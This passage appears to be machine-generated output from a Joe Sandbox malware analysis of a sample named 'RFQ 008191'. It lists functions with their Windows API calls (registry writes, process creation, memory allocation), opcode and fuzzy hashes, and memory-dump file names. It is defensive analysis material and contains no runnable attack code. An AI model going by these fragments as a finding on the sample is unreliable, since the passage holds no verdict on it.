                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                    • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                    Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                    • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                    Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                    • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                    • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                    • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                    Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                    • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                    • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                    • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                    Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                    • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                    • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                    • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                    Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                    • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                    • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                    • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                    Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                    • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                    • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                    • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                    Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree
                                                                    • String ID: 32079
                                                                    • API String ID: 3394109436-2447952077
                                                                    • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                    • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                                                    • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                    • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                                                    Function 004024AF Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CloseValuelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2655323295-0
                                                                    • Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                                    • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                                    • Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                                    • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                    • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                    • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                    • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                    Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 004056A9
                                                                      • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2896919175-0
                                                                    • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                    • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                                    • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                    • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                                    Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShow
                                                                    • String ID:
                                                                    • API String ID: 1136574915-0
                                                                    • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                    • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                                    • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                    • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                                    Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                    • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3712363035-0
                                                                    • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                    • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                    • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
